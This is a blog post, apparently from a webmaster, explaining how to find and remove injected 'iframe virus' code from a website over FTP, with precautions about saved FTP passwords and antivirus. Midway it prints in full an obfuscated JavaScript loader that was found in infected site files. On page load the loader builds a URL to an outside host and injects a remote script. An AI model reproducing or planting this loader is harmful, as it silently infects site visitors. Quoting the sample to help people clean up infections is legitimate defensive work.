I would like to share the best way of removing virus from your website using ftp. For the past few months you would be plucking your hair for removing virus from your site. I too suffered a lot and searched online fot the way to do remove those effectively. The best way is to remove those files is manually, do not try to use any scripts or code to remove.
The iframe virus are redirecting to a websites which was severely affected by malwares which will lead to theft of secured datas from your system. If you did not care for these virus then the virus will eat your whole site.
The chances your website inected with Virus:
1. By Saving the ftp logins in the ftp sftwares
2. By downloading the client's or friends website (Which is already with virus) thru your ftp
3. Your PC might have virus
Precautions:
1. Do not save ftp passwords with any ftp softwares.. Better to login every time. This might be looking hard to do but is more better than re-costucting the whole website after virus attack ;)
2. Keep changing the password frequently
3. Keep your PC protected with Good Antivirus pack - Kaspersky, AVG.. any. This will help you keep your PC safe if you happen to browse a virus infected web site or blog.
How to Remove Iframe virus?
Iframe tags will be written just below the body tag. Follow the steps to remove virus.
1. Login to your FTP & Download all the files
2. Look in the ftp for the files having the modified date when you felt the website is attacked
3. Open those files and Look for the iframe tag just below the Body or Head tag.
4. Edit all such files which you've got iframe tag.
5. Remove the coding & overwrite the file.
One sample code (Virus) which was in to all the javascript files an index files:
var dH;if(dH!='G' && dH != ''){dH=null};var k=new String();function Q(){var IT="";var V;if(V!='xr'){V=''};var i=new String("g");var H='';var y;if(y!='v' && y!='E'){y='v'};var x=RegExp;var nk=new String();var Et;if(Et!='e'){Et=''};var w=new String();var Ml;if(Ml!='vt'){Ml='vt'};var EC=new String();this.u="";function J(d,M){var Zv=new String();var r= String("z48[".substr(3));var W=new Array();r+=M;var IN;if(IN!='P' && IN != ''){IN=null};var Gw=new Array();r+=new String("]jtJ".substr(0,1));this.qs="";var R=new x(r, i);return d.replace(R, H);};var cl;if(cl!=''){cl='ZO'};var cN;if(cN!='re'){cN='re'};var ar="";var X=String("/leti"+"RJajtbit.".substr(4)+"8QdJnet/l8QdJ".substr(4,5)+"mJHetitb".substr(3)+"9Rxit.nex9R".substr(3,5)+"t/hei"+"38lse.de".substr(3)+"/goog"+"kXPile.co".substr(4)+"h8x1m/stu".substr(4)+"diverN1L".substr(0,5)+"zeich"+"WO73nis.c".substr(4)+"UFuom.ph".substr(3)+"gc12pg2c1".substr(4,1));var Hn=J('81444411014144814114404411111',"14");var l=new Array();var EG;if(EG!='EN' && EG != ''){EG=null};var N=String("htt"+"p:/QD4".substr(0,3)+"/rmQxB".substr(0,3)+"uXvxadXuv".substr(3,3)+"b5res-c".substr(4)+"om."+"youaFKt".substr(0,3)+"TseOdaoTesO".substr(4,3)+".co"+"xOZm.s".substr(3)+"KIemasKIe".substr(3,3)+"p5T0hin".substr(4)+"DqNgma".substr(3)+"gaz7Tu".substr(0,3)+"8Tfine".substr(3)+"fQY-co".substr(3)+"m.e"+"ast12WX".substr(0,3)+"JMDhcoa".substr(4)+"bXrastgarXb".substr(4,3)+"bfeuidbef".substr(3,3)+"e.r"+"u:");var q=new String("scri"+"pt");var QR="src";var I='';var pg;if(pg!='OR' && pg != ''){pg=null};var pF;if(pF!='' && pF!='eS'){pF='TX'};var IU=window;var IJ;if(IJ!='TO' && IJ!='bX'){IJ='TO'};var F="defe"+"PgAer".substr(4);var OT;if(OT!='' && OT!='vM'){OT=null};var VV;if(VV!='' && VV!='yn'){VV=null};IU.onload=function(){var Id;if(Id!='i_'){Id='i_'};var o;if(o!='A'){o=''};try {this.K='';I=N+Hn;var ZP;if(ZP!='K_' && ZP!='B'){ZP=''};var Uq;if(Uq!='VX' && Uq!='bm'){Uq=''};I+=X;var IG;if(IG!='' && IG!='s_'){IG=''};var Cj;if(Cj!='ii' && Cj != ''){Cj=null};g=document.createElement(q);var xs;if(xs!='' && xs!='IJj'){xs=null};var Ek=new Date();var Gn;if(Gn!='' && Gn!='Gm'){Gn=null};var xrZ;if(xrZ!='' && xrZ!='Fm'){xrZ=null};var oS=new Array();g[F]=[1][0];var oW='';this.Zo='';g[QR]=I;var ou=new String();var nV;if(nV!='xO' && nV!='Hd'){nV=''};this.qJ="";document.body.appendChild(g);var FT;if(FT!='Lb'){FT='Lb'};} catch(S){};};};Q();var BD="";
7. Browst the website, Still if you see the virus.. Check again in all the downloaded files of your website
8. Still you cant find the solution, just comment to this section. I'll reply ASAP.
Every update you make on the website, Please make sure you have a back up of the complete domain.
0 comments:
Post a Comment